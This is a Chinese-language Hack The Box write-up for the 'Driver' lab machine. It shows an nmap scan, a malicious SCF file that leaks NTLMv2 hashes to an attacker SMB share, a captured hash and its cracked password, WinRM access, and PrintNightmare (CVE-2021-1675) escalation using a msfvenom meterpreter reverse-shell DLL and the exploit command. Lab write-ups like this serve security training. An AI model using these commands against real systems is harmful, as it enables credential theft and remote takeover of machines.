HTB - Driver 详细解析

h1nt
404 阅读5分钟

本文已参与「新人创作礼」活动,一起开启掘金创作之路

0x01 端口探测

使用nmap对端口信息进行探测:

nmap -sV -sC -p- 10.10.11.106  

这里注意要扫全端口,否则会漏掉关键的5985端口:

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h15m00s, deviation: 0s, median: 7h14m59s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-10-24T18:59:15
|_  start_date: 2021-10-24T04:13:17

0x02 User Shell

打开网站看看80端口,发现需要验证,使用admin:admin进行登录:

image-20211025184203239

网站除了一个上传点没啥有用的信息。试着上传文件,发现没有回显。这就比较难办了。

image-20211025184314680

扫目录没有找到上传目录,陷入僵局。回上传界面看看,发现着重强调了一个manually,直觉告诉我这里有些有意思的地方。

image-20211024190608247

去htb的论坛逛了一下,发现有人提到了有个"Windows Specific"的Technique。一通搜索后发现是SCF攻击

构造SCF文件如下:

[Shell]
Command=2
IconFile=\10.10.16.33\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop

image-20211024191140361

随后开启Responder,监听VPN的网卡:

image-20211024191244645

将生成的恶意SCF文件上传,不久后就能抓到用户tony的一个NTLMv2 Hash:

image-20211024191340790

tony::DRIVER:bdf3633cc1b97438:083303BDA5669E8318761A18E5A9E23B:010100000000000080F7C40B0BC9D701FB88FCAB7AD7E8BA0000000002000800360043004700360001001E00570049004E002D00350030003100570044004D0033004F0035003100540004003400570049004E002D00350030003100570044004D0033004F003500310054002E0036004300470036002E004C004F00430041004C000300140036004300470036002E004C004F00430041004C000500140036004300470036002E004C004F00430041004C000700080080F7C40B0BC9D7010600040002000000080030003000000000000000000000000020000078F7201740AA3EEB44B5A2AD11535E46F3CE41F9DCD860C7E13A20E0401BCCC80A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E0033003300000000000000000000000000

使用Hashcat能够爆破出密码为liltony

image-20211024193214113

使用该用户能够成功访问smb共享,但遗憾的是都没有写的权限:

image-20211024193716559

回论坛又逛了一圈,有师傅提到多看看nmap的结果。遂重新扫了全端口,发现了5985亦即winrm的端口。

尝试使用msf的winrm利用模块失败了:

image-20211024200249232

但是evil-winrm工具可以成功拿到用户的shell:

image-20211024203259525

0x03 Root Shell

之后尝试提权,首先看看用户是否存在可以利用的敏感权限,未果:

whoami /priv

image-20211024204310214

想来想去这个Box的主题是Driver,然后Web界面提供的功能又是打印机的固件升级,可能突破点和打印机有关?

于是乎先看看是否有打印机服务,发现存在:

Get-Service -Name Spooler

image-20211024204456668

一通搜索后找到了最近出的一个CVE-2021-1675,它可以利用打印机服务的缺陷进行提权:

对这个漏洞的复现可参考freebuf的一篇文章,我们也主要通过这篇文章来操作。

首先配置smb服务,配置如下:

[global]
workgroup = workgroup
server string = test
netbios name = MZ
security = user
map to guest = Bad User
smb ports = 445
log file = /var/log/samba/log.%m
max log size = 5[smb]
comment = Samba
browseable = yes
writeable = yes
public = yes
path = /tmp/
read only = no
guest ok = yes

配置完成后重启smb服务:

sudo systemctl restart smbd.service

然后使用msfvenom生成木马放在/tmp目录下:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.34 lport=6666 -f dll -o reverse.dll

然后使用msf进行的handler进行监听:

image-20211024220857121

image-20211024211111395

之后运行漏洞脚本,稍等即可拿到meterpreter:

python3 CVE-2021-1675.py tony:liltony@10.10.11.106 '\10.10.16.34\smb\reverse.dll'

image-20211025145353347

image-20211025145450103

\

avatar
文章
阅读
粉丝